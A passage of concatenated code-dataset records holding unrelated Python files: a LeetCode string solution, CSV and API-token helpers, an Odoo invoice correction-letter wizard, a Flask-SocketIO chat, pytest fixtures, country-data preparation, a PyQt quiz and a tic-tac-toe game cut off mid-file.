\"tcode\"\n \n\nNote:\n\n1 <= s.length <= 4 * 10^5\ns contains only lowercase English letters.\n\"\"\"\n# big lao solution\n# Runtime: 148 ms, faster than 99.37% of Python3 online submissions for Last Substring in Lexicographical Order.\n# Memory Usage: 20.1 MB, less thanc 100.00% of Python3 online submissions for Last Substring in Lexicographical Order.\nclass Solution:\n def lastSubstring(self, s: str) -> str:\n n = len(s)\n max_indices = []\n max_char = max(set(s))\n consecutive = False\n for idx, char in enumerate(s):\n if char == max_char:\n if not consecutive:\n max_indices.append(idx)\n consecutive = True\n else:\n consecutive = False\n \n increment = 1\n while len(max_indices) > 1:\n new_indices = []\n base_char = \"\"\n for idx in max_indices:\n if idx + increment < n:\n new_char = s[idx+increment]\n else:\n new_char = \"\"\n if new_char > base_char:\n new_indices = [idx]\n base_char = new_char\n elif new_char == base_char:\n new_indices.append(idx)\n max_indices = new_indices.copy()\n increment += 1\n return s[max_indices[0]:]\n \n \n \n\n# brutal force\n# Runtime: 2416 ms, faster than 25.05% of Python3 online submissions for Last Substring in Lexicographical Order.\n# Memory Usage: 33.9 MB, less than 100.00% of Python3 online submissions for Last Substring in Lexicographical Order.\nclass Solution:\n def lastSubstring(self, s: str) -> str:\n n = len(s)\n sub_str = collections.defaultdict(list)\n for idx, char in enumerate(s):\n sub_str[char].append(idx)\n max_key = sorted(sub_str.keys())[-1]\n res = \"\"\n for idx in sub_str[max_key]:\n tmp_str = s[idx:]\n if tmp_str > res:\n res = tmp_str\n return res\n ","sub_path":"Widen/LC1163_Last_Substring_in_Lexicographical_Order.py","file_name":"LC1163_Last_Substring_in_Lexicographical_Order.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384526788","text":"import csv\n\ncsvfile = \"data.csv\"\n\n#Assuming res is a flat list\n\"\"\"\nwith open(csvfile, \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n for val in res:\n writer.writerow([val]) \n\"\"\"\n#Assuming res is a list of lists\ndef writeCSVFile(res):\n\tcsvfile = \"dataSurvey.csv\"\n\twith open(csvfile, \"w\") as output:\n\t writer = csv.writer(output, lineterminator='\\n')\n\t writer.writerows(res)\n\n","sub_path":"app/writeCSV.py","file_name":"writeCSV.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165563322","text":"#传入参数telephone,根据传入参数查找tocken,如果没有找到则登录生成并写入文件\n#取文件中tocken使用,测试请求,如果请求成功则返回tocken。如果请求报错(tocken错误)则重新登录生成tocken 并更新文件内容\n\nimport base64\nfrom common import http_requests,read_txt\n\nfrom conf import project_path\n\nclass ForTocken():\n def __init__(self,telephone):\n self.telephone=telephone\n\n def again_log(self):\n url = 'https://new-test-ck.haochang.tv/api/captcha/telphone'\n param = {'telphone': self.telephone}\n headers = {'x-api-test': 'true'}\n http_requests.RequestsClass(url=url, param=param, headers=headers).http_requests(method='get')\n url = 'https://new-test-ck.haochang.tv/api/login/telphone'\n param = {'telphone': self.telephone, 'captcha': '1234'}\n req_data = http_requests.RequestsClass(url=url, param=param, headers=headers).http_requests(method='post')\n tocken = req_data.json()['authorizeToken']\n roomid = req_data.json()['data']['room']['roomId']\n userid=req_data.json()['data']['user']['userId']\n return [tocken,roomid,userid]\n\n def toc_base(self,tocken):\n tocken= str(base64.b64encode(bytes(tocken, encoding = \"utf8\")), encoding = \"utf-8\")\n return tocken\n\n def return_tocken(self):\n data=eval(read_txt.DoTxt(project_path.log_data).read_txt())\n if self.telephone in data.keys():\n headers = {'x-api-test': 'true','authorize-token': self.toc_base(data[self.telephone][0])}\n url='https://new-test-ck.haochang.tv/api/accompany/db'\n req_data = http_requests.RequestsClass(url=url, param={}, headers=headers).http_requests(method='get')\n if req_data.json()['errno'] =='0':\n tocken = self.toc_base(data[self.telephone][0])\n roomid = data[self.telephone][1]\n userid = data[self.telephone][2]\n elif req_data.json()['errno'] == '100002':\n log_in=self.again_log()\n tocken = self.toc_base(log_in[0])\n userid = log_in[2]\n roomid = log_in[1]\n data[self.telephone] = log_in\n read_txt.DoTxt(project_path.log_data).write_txt(str(data))\n else:\n print('接口报错了')\n else:\n re_tocken=self.again_log()\n tocken=self.toc_base(re_tocken[0])\n roomid = re_tocken[1]\n userid = re_tocken[2]\n data[self.telephone]=re_tocken\n read_txt.DoTxt(project_path.log_data).write_txt(str(data))\n return [tocken,roomid,userid]\n\n\nif __name__ == '__main__':\n a= ForTocken('18600000001').return_tocken()\n print (a)","sub_path":"common/for_api_tocken.py","file_name":"for_api_tocken.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368593964","text":"# -*- encoding: utf-8 -*-\n###############################################################################\n# #\n# Copyright (C) 2014 KMEE (http://www.kmee.com.br) #\n# @author Rafael da Silva Lima #\n# Matheus Lima Felix #\n# #\n#This program is free software: you can redistribute it and/or modify #\n#it under the terms of the GNU Affero General Public License as published by #\n#the Free Software Foundation, either version 3 of the License, or #\n#(at your option) any later version. #\n# #\n#This program is distributed in the hope that it will be useful, #\n#but WITHOUT ANY WARRANTY; without even the implied warranty of #\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n#GNU Affero General Public License for more details. #\n# #\n#You should have received a copy of the GNU Affero General Public License #\n#along with this program. If not, see . #\n###############################################################################\n\nfrom openerp.osv import fields, orm\nfrom openerp.tools.translate import _\nfrom nfe.sped.nfe.processing.xml import send_correction_letter\n\nclass NfeInvoiceCce(orm.TransientModel):\n\n _name='nfe.invoice_cce'\n \n _columns = {\n 'mensagem': fields.text('Mensagem', required=True),\n }\n \n def _check_name(self, cr, uid, ids):\n \n for nfe in self.browse(cr, uid, ids):\n\n if not (len(nfe.mensagem) >= 15):\n return False\n \n return True\n \n _constraints = [(_check_name, 'Tamanho de mensagem inválida !', ['mensagem'])]\n \n def action_enviar_carta(self, cr, uid, ids, context=None):\n\n if context is None:\n context = {}\n \n correcao = self.browse(cr, uid, ids)[0].mensagem\n\n obj_invoice = self.pool.get('account.invoice')\n obj_cce = self.pool.get('l10n_br_account.invoice.cce')\n invoice_ids = context and context.get('active_ids') or []\n \n for invoice in obj_invoice.browse(cr, uid, invoice_ids):\n chave_nfe = invoice.nfe_access_key\n \n company_pool = self.pool.get('res.company')\n company = company_pool.browse(cr, uid, invoice.company_id.id)\n event_obj = self.pool.get('l10n_br_account.document_event')\n domain = [('invoice_id', '=', invoice.id)] \n sequencia = len(obj_cce.search(cr, uid, domain ))+1\n results = []\n try:\n processo = send_correction_letter(company, chave_nfe, sequencia, correcao)\n vals = {\n 'type': str(processo.webservice),\n 'status': processo.resposta.retEvento[0].infEvento.cStat.valor,\n 'response': '',\n 'company_id': company.id,\n 'origin': '[CC-E] ' + str(invoice.internal_number),\n# 'file_sent': processo.arquivos[0]['arquivo'], #TODO não implementado no PySPED\n# 'file_returned': processo.arquivos[1]['arquivo'],\n 'message': processo.resposta.retEvento[0].infEvento.xEvento.valor,\n 'state': 'done',\n 'document_event_ids': invoice.id}\n results.append(vals)\n obj_invoice.attach_file_event(cr, uid, invoice_ids, sequencia, 'cce', 'xml', context)\n\n except Exception as e:\n vals = {\n 'type': '-1',\n 'status': '000',\n 'response': 'response',\n 'company_id': company.id,\n 'origin': '[CC-E]' + str(invoice.internal_number),\n 'file_sent': 'False',\n 'file_returned': 'False',\n 'message': 'Erro desconhecido ' + e.message,\n 'state': 'done',\n 'document_event_ids': invoice.id,\n }\n results.append(vals)\n finally:\n for result in results:\n event_obj.create(cr, uid, result) \n obj_cce.create(cr,uid, \n {'invoice_id': invoice.id,\n 'motivo': correcao,\n 'sequencia': sequencia,\n } \n ) \n return {'type': 'ir.actions.act_window_close'}\n","sub_path":"nfe/wizard/nfe_invoice_cce.py","file_name":"nfe_invoice_cce.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"74793901","text":"from flask import Flask, render_template, request\nfrom flask_socketio import SocketIO, send, emit\nfrom time import gmtime, strftime\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nclients = []\n\n@socketio.on('connect')\ndef test_connect():\n emit('my response', {'data': 'Connected'})\n\n@socketio.on('message')\ndef handle_message(json):\n send(\"(\" +str(strftime(\"%H:%M:%S\", gmtime()))+\") \" + json, broadcast=True)\n\n@app.route(\"/\")\ndef main():\n return render_template('index.htm')\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"390818342","text":"#_author:leo gao\n#encoding:utf-8\n\nimport pytest\nfrom operationalLayer.Login.login import LoginOperate\nfrom operationalLayer.deviceManagement.deviceManagementAddOperate import DeviceManagementAddOperate\nfrom operationalLayer.deviceManagement.deviceManagementModifyOperate import DeviceManagementModifyOperate\nfrom Url.Login import login\nfrom Url.deviceManagement import deviceManagement\nfrom Data.Login import noraml_login_data\nfrom Data.deviceManagement.add_device import normal_add_device_data\nfrom Utils.operateDatabaseData import delete_database_data_test_ci, add_database_data_test_ci\n\n\n@pytest.fixture()\ndef state_login_class(state_driver):\n login_operate = LoginOperate(state_driver, login.login_url)\n return login_operate\n\n\n@pytest.fixture()\ndef normal_login(state_login_class):\n '''\n 用例描述:输入正确管理员账号,正确密码,验证码(随便)正常登录\n :return:\n '''\n\n state_login_class.get_login_url()\n state_login_class.input_account(noraml_login_data.account, noraml_login_data.password,\n noraml_login_data.verification_code)\n state_login_class.confirm_login_button()\n\n\n@pytest.fixture()\ndef state_add_device_management_class(state_driver):\n add_device_management_operate = DeviceManagementAddOperate(state_driver, deviceManagement.device_manager_url)\n return add_device_management_operate\n\n\n@pytest.fixture()\ndef add_device_fixture(state_add_device_management_class):\n state_add_device_management_class.click_device_management()\n state_add_device_management_class.input_device_name_ip(\n normal_add_device_data.normal_add_device_data.get('device_name'),\n normal_add_device_data.normal_add_device_data.get('device_ip'))\n state_add_device_management_class.choose_device_type()\n state_add_device_management_class.choose_organization_manufacturer(normal_add_device_data.\n normal_add_device_data.get('manufacturer'))\n\n\n@pytest.fixture()\ndef state_modify_device_management_class(state_driver):\n modify_device_management_operate = DeviceManagementModifyOperate(state_driver, deviceManagement.device_manager_url)\n return modify_device_management_operate\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef database_base_configuration():\n delete_database_data_test_ci()\n add_database_data_test_ci()\n\n","sub_path":"test_cases/test_device_management/test_modify_device/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"124853614","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\nimport twitter\nimport random\n\ntweets = []\ntweets.append('aaaa')\ntweets.append('bbbb')\ntweets.append('cccc')\n\ntweet = tweets[random.randint(0, len(tweets)-1)]\n\napi = twitter.Api(consumer_key = \"\",\n consumer_secret = \"\",\n access_token_key = \"\",\n access_token_secret = \"\")\n\napi.PostUpdate(tweet)\n","sub_path":"post_twitter.py","file_name":"post_twitter.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"109858782","text":"from pathlib import Path\n\nimport pandas as pd\nimport pycountry\n\nimport mundi\n\ninv = lambda d: {v: k for k, v in d.items()}\nPATH = Path(__file__).parent.resolve()\nCOL_RENAME = {\"alpha_2\": \"short_code\", \"alpha_3\": \"long_code\", \"numeric\": \"numeric_code\"}\nREGION_MAP = inv(mundi.REGION_DESCRIPTIONS)\nINCOME_MAP = inv(mundi.INCOME_GROUP_DESCRIPTIONS)\n\n#\n# This script uses pycountry (https://pypi.org/project/pycountry/) as the main\n# source of information about countries and sub-divisions.\n#\ndf = pd.DataFrame([c._fields for c in pycountry.countries])\ndf = (\n df.rename(COL_RENAME, axis=1)\n .drop(columns=[\"official_name\", \"common_name\"])\n .astype(\"string\")\n .set_index(\"short_code\", drop=False)\n)\ndf.index.name = \"id\"\n\ndf[\"type\"] = \"country\"\ndf[\"subtype\"] = pd.NA\ndf[\"country_code\"] = pd.NA\ndf = df.astype(\"string\")\n\n#\n# Load UN classifications from world bank data\n#\nun_classes = pd.read_csv(PATH / \"world-bank-summary.csv\", index_col=0, dtype=\"string\")\nun_classes = un_classes[[\"region\", \"income_group\"]]\nun_classes[\"id\"] = df[\"long_code\"].reset_index().set_index(\"long_code\")\nun_classes = un_classes.dropna().set_index(\"id\")\n\n# Save to dataframe\nun_classes[\"region\"] = un_classes[\"region\"].apply(REGION_MAP.get)\nun_classes[\"income_group\"] = un_classes[\"income_group\"].apply(INCOME_MAP.get)\n\npath = PATH / \"processed\" / \"un.pkl\"\nun_classes.astype(\"category\").to_pickle(path)\nprint(f\"UN data saved to {path}\")\n\n\n#\n# Loading continents\n#\n\n# Load continent codes\n# https://en.wikipedia.org/wiki/List_of_sovereign_states_and_dependent_territories_by_continent_(data_file)#Data_file\ndata = pd.read_csv(PATH / \"countries-to-continents.csv\", index_col=0, dtype=\"string\")\ndf[\"parent_id\"] = \"X\" + data[\"continent_id\"]\n\n# Load continents\ndata = pd.read_csv(PATH / \"continents.csv\").fillna(\"NA\").set_index(\"id\")\ndata[\"type\"] = \"continent\"\ndata[\"parent_id\"] = \"XX\"\ndata[\"short_code\"] = data.index\ndata.loc[\"XX\", \"parent_id\"] = pd.NA\ndf = pd.concat([df, data]).astype(\"string\")\n\n# Transcontinental countries are assigned to their secondary continent in the\n# alt_parent column.\n# https://en.wikipedia.org/wiki/List_of_transcontinental_countries\ndf[\"alt_parents\"] = pd.Series(\n {\n \"AZ\": \"XEU\",\n \"AM\": \"XAS\",\n \"CY\": \"XAS\",\n \"GE\": \"XAS\",\n \"KZ\": \"XEU\",\n \"UM\": \"XOC\",\n \"RU\": \"XAS\",\n \"TR\": \"XEU\",\n \"EG\": \"XAS\",\n },\n dtype=\"string\",\n)\ndf[\"alt_parents\"] = \";\" + df[\"alt_parents\"]\n\n#\n# Saving results\n#\ndf = df.astype(\"string\")[mundi.DATA_COLUMNS[\"mundi\"]]\nassert len(set(df.index)) == len(df)\n\npath = PATH / \"processed\" / \"mundi-A1-countries.pkl\"\ndf.to_pickle(path)\nprint(f\"Country data saved to {path}\")\n","sub_path":"data/XX/prepare-countries.py","file_name":"prepare-countries.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"601153450","text":"import sys\r\nimport random\r\nimport xml.dom.minidom\r\nfrom learn1 import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass MyWin(QtWidgets.QMainWindow):\r\n \r\n text = []\r\n questions = []\r\n variants = []\r\n correct = []\r\n \r\n def __init__(self, parent=None):\r\n QtWidgets.QWidget.__init__(self, parent)\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.dom = xml.dom.minidom.parse('learn.xml')\r\n self.collection = self.dom.documentElement\r\n self.linesArr = self.collection.getElementsByTagName(\"text\")\r\n\r\n for line in self.linesArr:\r\n self.text.append(line.childNodes[0].data)\r\n self.questions.append(line.getAttribute('question'))\r\n self.variants.append(line.getAttribute('answers').split('**?**'))\r\n self.correct.append(line.getAttribute('correct'))\r\n\r\n random.shuffle(self.variants[0])\r\n random.shuffle(self.variants[1])\r\n random.shuffle(self.variants[2])\r\n \r\n random.shuffle(self.variants[3])\r\n random.shuffle(self.variants[4])\r\n random.shuffle(self.variants[5])\r\n random.shuffle(self.variants[6])\r\n random.shuffle(self.variants[7])\r\n random.shuffle(self.variants[8])\r\n random.shuffle(self.variants[9])\r\n\r\n self.ui.textEdit.setText(self.questions[0])\r\n self.ui.textEdit_2.setText(self.questions[1])\r\n self.ui.textEdit_3.setText(self.questions[2])\r\n \r\n self.ui.textEdit_7.setText(self.questions[3])\r\n self.ui.textEdit_8.setText(self.questions[4])\r\n self.ui.textEdit_24.setText(self.questions[5])\r\n self.ui.textEdit_25.setText(self.questions[6])\r\n self.ui.textEdit_26.setText(self.questions[7])\r\n self.ui.textEdit_27.setText(self.questions[8])\r\n self.ui.textEdit_28.setText(self.questions[9])\r\n \r\n \r\n self.ui.label.setText(self.text[0])\r\n self.ui.label_2.setText(self.text[1])\r\n self.ui.label_3.setText(self.text[2])\r\n\r\n self.ui.label_7.setText(self.text[2])\r\n self.ui.label_8.setText(self.text[2])\r\n self.ui.label_24.setText(self.text[2])\r\n self.ui.label_25.setText(self.text[2])\r\n self.ui.label_26.setText(self.text[2])\r\n self.ui.label_27.setText(self.text[2])\r\n self.ui.label_28.setText(self.text[2])\r\n\r\n self.ui.radioButton.setText(self.variants[0][0])\r\n self.ui.radioButton_2.setText(self.variants[0][1])\r\n self.ui.radioButton_3.setText(self.variants[0][2])\r\n\r\n self.ui.radioButton_4.setText(self.variants[1][0])\r\n self.ui.radioButton_5.setText(self.variants[1][1])\r\n self.ui.radioButton_6.setText(self.variants[1][2])\r\n\r\n self.ui.radioButton_7.setText(self.variants[2][0])\r\n self.ui.radioButton_8.setText(self.variants[2][1])\r\n self.ui.radioButton_9.setText(self.variants[2][2])\r\n\r\n \r\n\r\n self.ui.radioButton_19.setText(self.variants[3][0])\r\n self.ui.radioButton_20.setText(self.variants[3][1])\r\n self.ui.radioButton_21.setText(self.variants[3][2])\r\n\r\n self.ui.radioButton_22.setText(self.variants[4][0])\r\n self.ui.radioButton_23.setText(self.variants[4][1])\r\n self.ui.radioButton_24.setText(self.variants[4][2])\r\n\r\n self.ui.radioButton_70.setText(self.variants[5][0])\r\n self.ui.radioButton_71.setText(self.variants[5][1])\r\n self.ui.radioButton_72.setText(self.variants[5][2])\r\n\r\n self.ui.radioButton_73.setText(self.variants[6][0])\r\n self.ui.radioButton_74.setText(self.variants[6][1])\r\n self.ui.radioButton_75.setText(self.variants[6][2])\r\n\r\n self.ui.radioButton_76.setText(self.variants[7][0])\r\n self.ui.radioButton_77.setText(self.variants[7][1])\r\n self.ui.radioButton_78.setText(self.variants[7][2])\r\n\r\n self.ui.radioButton_79.setText(self.variants[8][0])\r\n self.ui.radioButton_80.setText(self.variants[8][1])\r\n self.ui.radioButton_81.setText(self.variants[8][2])\r\n\r\n self.ui.radioButton_82.setText(self.variants[9][0])\r\n self.ui.radioButton_83.setText(self.variants[9][1])\r\n self.ui.radioButton_84.setText(self.variants[9][2])\r\n \r\n\r\n self.ui.tabWidget.setTabEnabled(1, False)\r\n self.ui.tabWidget.setTabEnabled(2, False)\r\n \r\n self.ui.tabWidget.setTabEnabled(3, False)\r\n self.ui.tabWidget.setTabEnabled(4, False)\r\n self.ui.tabWidget.setTabEnabled(5, False)\r\n self.ui.tabWidget.setTabEnabled(6, False)\r\n self.ui.tabWidget.setTabEnabled(7, False)\r\n self.ui.tabWidget.setTabEnabled(8, False)\r\n self.ui.tabWidget.setTabEnabled(9, False)\r\n\r\n self.ui.buttonGroup.buttonClicked.connect(self.correctAnsl)\r\n self.ui.buttonGroup_2.buttonClicked.connect(self.correctAnsl2)\r\n self.ui.buttonGroup_3.buttonClicked.connect(self.correctAnsl3)\r\n\r\n self.ui.buttonGroup_4.buttonClicked.connect(self.correctAnsl4)\r\n self.ui.buttonGroup_5.buttonClicked.connect(self.correctAnsl5)\r\n self.ui.buttonGroup_6.buttonClicked.connect(self.correctAnsl6)\r\n self.ui.buttonGroup_7.buttonClicked.connect(self.correctAnsl7)\r\n self.ui.buttonGroup_8.buttonClicked.connect(self.correctAnsl8)\r\n self.ui.buttonGroup_9.buttonClicked.connect(self.correctAnsl9)\r\n self.ui.buttonGroup_10.buttonClicked.connect(self.correctAnsl10)\r\n\r\n\r\n\r\n def correctAnsl(self):\r\n for rb in self.ui.buttonGroup.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[0]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(1, True)\r\n\r\n def correctAnsl2(self):\r\n for rb in self.ui.buttonGroup_2.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[1]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_2.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(2, True)\r\n\r\n def correctAnsl3(self):\r\n for rb in self.ui.buttonGroup_3.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[2]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_3.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(3, True)\r\n\r\n def correctAnsl4(self):\r\n for rb in self.ui.buttonGroup_4.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[3]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_7.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(4, True)\r\n\r\n def correctAnsl5(self):\r\n for rb in self.ui.buttonGroup_5.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[4]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_8.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(5, True)\r\n\r\n def correctAnsl6(self):\r\n for rb in self.ui.buttonGroup_6.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[5]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_9.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(6, True)\r\n \r\n def correctAnsl7(self):\r\n for rb in self.ui.buttonGroup_7.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[6]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_10.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(7, True)\r\n\r\n def correctAnsl8(self):\r\n for rb in self.ui.buttonGroup_8.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[7]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_11.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(8, True)\r\n\r\n def correctAnsl9(self):\r\n for rb in self.ui.buttonGroup_9.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[8]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_12.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(9, True)\r\n\r\n def correctAnsl10(self):\r\n for rb in self.ui.buttonGroup_10.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[9]:\r\n self.ui.statusbar.showMessage(\"Верно! Тест пройден!!!\",5000)\r\n self.ui.tab_13.setEnabled(False)\r\n \r\n\r\nif __name__==\"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n myapp = MyWin()\r\n myapp.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\n \r\n","sub_path":"1 семестр/3/Test/learnmain1.py","file_name":"learnmain1.py","file_ext":"py","file_size_in_byte":9067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"128049959","text":"#! /usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\n Vegalt : find an vegan alternative to animal food products\n\n Files : cl_db_interactions.py, call-api.py, db_vegalt.sql, cl_vegalt.py, main.py\n\"\"\"\n\nfrom cl_vegalt import Vegalt\n\ndef main():\n \"\"\" Program loop \"\"\"\n\n # pylint: disable=line-too-long\n\n print(\"\\n ---- Vegalt - Trouvez une alternative végétale aux aliments issus de produits animaux ----\")\n\n # Connection to the database and start the program\n vegalt = Vegalt()\n vegalt.menu()\n\n continue_program = 1\n\n while continue_program:\n\n possibles_choices = [\"0\", \"1\", \"2\"]\n choice = vegalt.get_choice(\"\\n -- Choisissez 1 ou 2 (ou 0 pour quitter) : \", possibles_choices)\n\n if choice == \"0\":\n print(\"A bientôt !\")\n continue_program = 0\n\n if choice == \"1\":\n\n # Get the list of \"animals\" categories\n categories = vegalt.database.get_categories(0)\n\n print(\"\\n Voici les catégories d'aliments disponibles : \\n\")\n # Dictionnary to do the correspondance between the category id and the number (index) choosen\n id_correspondance = {}\n # Print each category and ask for choose one\n for index, category in enumerate(categories):\n print(index, \"-\", category[\"category_name\"])\n id_correspondance[str(index)] = category[\"id\"]\n\n possibles_choices = list(id_correspondance.keys())\n category_choice = vegalt.get_choice(\"\\n -- Entrez le chiffre de la catégorie voulue :\", possibles_choices)\n\n # Get the category id in the correspondance dictionnary\n category_id = id_correspondance[category_choice]\n\n # Get 10 random products associated to the choosen category\n products = vegalt.database.get_products_from_category(category_id, 10)\n\n print(\"\\n\")\n index_product = []\n # Print the products and ask for choose one\n for index, product in enumerate(products):\n print(index, \"-\", product[\"product_name\"], \"de\", product[\"brand_name\"])\n index_product.append(str(index))\n\n vegalt.get_choice(\"\\n -- Entrez le chiffre du produit que vous voulez remplacer :\", index_product)\n\n # Get 1 random product associated to the choosen category, but on vegan version\n veg_category_id = category_id + 1\n vegalt_product = vegalt.database.get_vegalt_product(veg_category_id, 1)\n\n print(\"\\nVous pouvez tester comme alternative végétale :\", vegalt_product[\"product_name\"], \"de la marque\", vegalt_product[\"brand_name\"])\n if vegalt_product[\"store\"]:\n print(\"Vous pouvez l'acheter dans ce magasin :\", vegalt_product[\"store\"])\n else:\n print(\"Malheureusement, nous n'avons pas trouvé de magasin où acheter ce produit\")\n print(\"Si vous voulez en savoir plus sur ce produit, ça se passe ici :\", vegalt_product[\"link\"])\n\n possibles_choices = [\"0\", \"1\"]\n registration_choice = vegalt.get_choice(\"\\n -- Voulez-vous enregistrer ce produit ? 0 (non) / 1 (oui):\", possibles_choices)\n\n if registration_choice == \"1\":\n vegalt.database.register_product(vegalt_product[\"id\"])\n\n print(\"\\nLe produit a bien été enregistré dans vos favoris :)\")\n vegalt.menu()\n\n elif registration_choice == \"0\":\n print(\"\\nLe produit n'a pas été enregistré. Une autre fois peut-être !\")\n vegalt.menu()\n\n elif choice == \"2\":\n\n fav_products = vegalt.database.get_registered_products()\n\n if not fav_products:\n print(\"\\n Vous n'avez pas encore enregistré de produits en favori. Choisissez une catégorie et un produit, puis enregistrez-le pour le retrouver ici la prochaine fois.\")\n # Back to main menu\n vegalt.menu()\n else:\n print(\"\\n -- Voici vos produits enregistrés : \\n\")\n\n for fav_product in fav_products:\n print(fav_product[\"product_name\"], \"de\", fav_product[\"brand_name\"], \"(\", fav_product[\"link\"], \")\")\n\n vegalt.menu()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533081529","text":"import random\r\nNUM_SQUARES = 9\r\nPLAYER1 = 'X'\r\nPLAYER2 = 'O'\r\nEMPTY = ' '\r\n\r\ndef create_board():\r\n \"\"\"Create a new empty tic-tac-toe board.\"\"\"\r\n board = []\r\n for square in range(NUM_SQUARES):\r\n board.append(EMPTY)\r\n return board\r\n\r\ndef display_board(board):\r\n \"\"\"Displays game board on screen\"\"\"\r\n print(\"\\n\\t\", board[0], \"|\", board[1], \"|\", board[2])\r\n print(\"\\t\", \"---------\")\r\n print(\"\\n\\t\", board[3], \"|\", board[4], \"|\", board[5])\r\n print(\"\\t\", \"---------\")\r\n print(\"\\n\\t\", board[6], \"|\", board[7], \"|\", board[8])\r\n\r\ndef player_letter():\r\n \"\"\"Decides what letter the player wants to be.\"\"\"\r\n letter = EMPTY\r\n while letter != PLAYER1 and letter != PLAYER2:\r\n letter = input(\"Do you want to be X or O? X is player 1, O is player 2 \").upper()\r\n print(\"You are now\", letter)\r\n\r\n if letter == 'X':\r\n return ['X', 'O']\r\n else:\r\n return ['O', 'X']\r\n\r\ndef first_or_second():\r\n \"\"\"Decides who goes first or second.\"\"\"\r\n if random.randint(0,1) == 0:\r\n print(\"The computer will go first\")\r\n return True\r\n else:\r\n print(\"The player will go first\")\r\n return False\r\n\r\ndef ask_number(board):\r\n \"\"\"Asks user for number to piece on board.\"\"\"\r\n number = \"-1\"\r\n while not number.isnumeric() or int(number) > 8 or int(number) < 0 or not isSpaceFree(board, int(number)):\r\n number = input(\"Please select a number between 0 and 8, and is an empty space. \")\r\n\r\n return number\r\n\r\ndef place_piece(number, letter, board):\r\n \"\"\"Puts piece on board.\"\"\"\r\n board[int(number)] = letter\r\n return board\r\n\r\ndef check_won(bo, turn):\r\n \"\"\"Checks if you won or not.\"\"\"\r\n return ((bo[6] == turn and bo[7] == turn and bo[8] == turn) or (bo[2] == turn and bo[4] == turn and bo[6] == turn) or (bo[0] == turn and bo[1] == turn and bo[2] == turn) or (bo[7] == turn and bo[4] == turn and bo[1] == turn) or (bo[8] == turn and bo[5] == turn and bo[2] == turn) or (bo[0] == turn and bo[1] == turn and bo[2] == turn) or (bo[3] == turn and bo[4] == turn and bo[5] == turn) or(bo[0] == turn and bo[3] == turn and bo[6] == turn) or(bo[0] == turn and bo[4] == turn and bo[8] == turn))\r\n \r\ndef isSpaceFree(board, number):\r\n return board[number] == EMPTY\r\n\r\ndef isSpacesFree(board, number_list):\r\n# Check if squares in number_list are empty.\r\n# Loop or go through the list.\r\n # For each square in the list, see if it is free or not.\r\n # True (it is free): return True\r\n# Exited the loop because reached end of list, didn't find 